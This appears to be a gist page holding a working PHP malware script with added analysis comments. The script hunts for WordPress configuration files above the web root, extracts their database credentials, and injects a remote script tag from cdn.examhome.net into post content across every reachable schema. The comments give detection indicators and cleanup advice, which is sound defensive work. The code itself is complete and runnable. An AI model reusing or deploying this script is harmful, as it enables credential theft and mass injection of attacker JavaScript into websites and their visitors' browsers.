Created
October 4, 2018 20:31
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
<?php echo ":#009009#:"; | |
// NOTE(analysis): the echo above emits the literal marker ":#009009#:". The same
// marker is echoed again after the directory walk, so everything the script prints
// is bracketed by it. The marker in an HTTP response body is a usable detection string.
// File name the walk below looks for: the WordPress configuration file.
$file_to_search = "wp-config.php"; | |
// Run the recursive search from five directory levels above the web root, then
// four, three, two, one, and finally the web root itself. The start points overlap,
// and anything the PHP process can list and read above DOCUMENT_ROOT is in scope,
// so on a shared host the reach is not limited to the site that served this script.
// The "@" prefix suppresses the warnings that unreadable paths would otherwise raise.
@search_file($_SERVER['DOCUMENT_ROOT']."/../../../../..",$file_to_search); | |
@search_file($_SERVER['DOCUMENT_ROOT']."/../../../..",$file_to_search); | |
@search_file($_SERVER['DOCUMENT_ROOT']."/../../..",$file_to_search); | |
@search_file($_SERVER['DOCUMENT_ROOT']."/../..",$file_to_search); | |
@search_file($_SERVER['DOCUMENT_ROOT']."/..",$file_to_search); | |
@search_file($_SERVER['DOCUMENT_ROOT'],$file_to_search); | |
/**
 * Recursively walks $dir and passes every matching file to show_sitenames().
 *
 * A file matches when its name contains $file_to_search as a substring (strpos),
 * so copies such as "wp-config.php.bak" are picked up as well as the live file.
 * Every sub-directory other than "." and ".." is descended into.
 *
 * Defensive note: the walk only reaches what the PHP process can list and read.
 * open_basedir and per-site file ownership narrow that, and stray copies of the
 * configuration file should not be left on disk.
 *
 * @param string $dir            Directory to scan.
 * @param string $file_to_search Substring looked for in file names.
 */
function search_file($dir,$file_to_search){ | |
// Directory listing, including the "." and ".." entries.
$files = scandir($dir); | |
foreach($files as $key => $value){ | |
// Canonical absolute path of the entry.
$path = realpath($dir.DIRECTORY_SEPARATOR.$value); | |
if(!is_dir($path)) { | |
// Not a directory: substring test on the entry name, not an exact comparison.
if (strpos($value,$file_to_search) !== false) { | |
show_sitenames($path); | |
} | |
// Directory: recurse, skipping the self and parent entries.
} else if($value != "." && $value != "..") { | |
search_file($path, $file_to_search); | |
} | |
} | |
} | |
// Closing copy of the ":#009009#:" marker printed at the top of the script. The
// per-file status lines echoed by show_sitenames() appear between the two markers.
echo ":#009009#:"; | |
/**
 * Reads a WordPress configuration file, logs in to the database it describes and
 * appends a remote <script> tag to stored post content.
 *
 * Steps visible in the code:
 *  1. Read $file (errors suppressed) and continue only if it contains "DB_NAME".
 *  2. Extract DB_NAME, DB_HOST, DB_USER and DB_PASSWORD with get_var_reg(). The
 *     DB_NAME value is stored in $db but not used afterwards.
 *  3. Connect with mysqli without selecting a database, then list every table in
 *     information_schema.TABLES whose name contains "post". This covers all
 *     schemas the account can see, not only the one named in the file.
 *  4. For each such table, read one post_content value. If it does not contain
 *     "examhome", echo "nothing:<file>" and run an UPDATE that appends a script
 *     tag loading cdn.js from cdn.examhome[.]net to every row not already
 *     containing "examhome". Otherwise echo "already exist:<file>".
 *
 * Indicators on this page: the string "examhome" in post_content, the host
 * cdn.examhome[.]net, and the "nothing:" / "already exist:" status lines.
 *
 * Response notes: credentials in any configuration file this function could read
 * should be treated as disclosed and rotated. Cleanup has to cover every schema
 * and table reachable with those credentials. A database account limited to its
 * own site's schema narrows the effect of step 3.
 *
 * @param string $file Path of the candidate configuration file.
 */
function show_sitenames($file){ | |
// "@" hides read errors; an unreadable file yields false and fails the check below.
$content = @file_get_contents($file); | |
if(strpos($content, "DB_NAME") !== false) { | |
// Pull the quoted value that follows each constant name in the file text.
$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content); | |
$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content); | |
$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content); | |
$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content); | |
// Create connection | |
// No database name is passed, so later queries use schema-qualified table names.
$conn = new mysqli($host, $user, $pass); | |
// Check connection | |
if ($conn->connect_error) { | |
// The connection error text is written to the script's output.
echo $conn->connect_error; | |
} else { | |
// Enumerate every table visible to this account whose name contains "post".
$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'"; | |
$result = $conn->query($q); | |
if ($result->num_rows > 0) { | |
while($row = $result->fetch_assoc()) { | |
// Sample a single post_content value from the table as an "already modified" probe.
$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 "; | |
$result2 = $conn->query($q2); | |
if ($result2->num_rows > 0) { | |
while($row2 = $result2->fetch_assoc()) { | |
$val = $row2['post_content']; | |
if(strpos($val, "examhome") === false){ | |
// Status line naming the configuration file whose credentials were used.
echo "nothing:".$file."\n"; | |
// Appends the script tag to every row of the table that lacks the "examhome" string.
$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://cdn.examhome.net/cdn.js?ver=1.0.88' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%examhome%'"; | |
$conn->query($q3); | |
} else { | |
echo "already exist:".$file."\n"; | |
} | |
} | |
} else { | |
} | |
} | |
} else { | |
} | |
$conn->close(); | |
} | |
} | |
} | |
/**
 * Returns the first capture group of the first match of $pat in $text.
 *
 * The pattern is wrapped in "/" delimiters and run with the "i" (case-insensitive)
 * and "s" (dot matches newline) modifiers.
 *
 * @param string $pat  Regular expression body, without delimiters.
 * @param string $text Text to search.
 * @return string The captured value, or "" when nothing matches.
 */
function get_var_reg($pat,$text) { | |
// $c receives the match count and is used only as the truth value of the condition.
if ($c = preg_match_all ("/".$pat."/is", $text, $matches)) | |
{ | |
return $matches[1][0]; | |
} | |
return ""; | |
} | |
// Ends the script here, after the closing marker has been printed.
exit(); |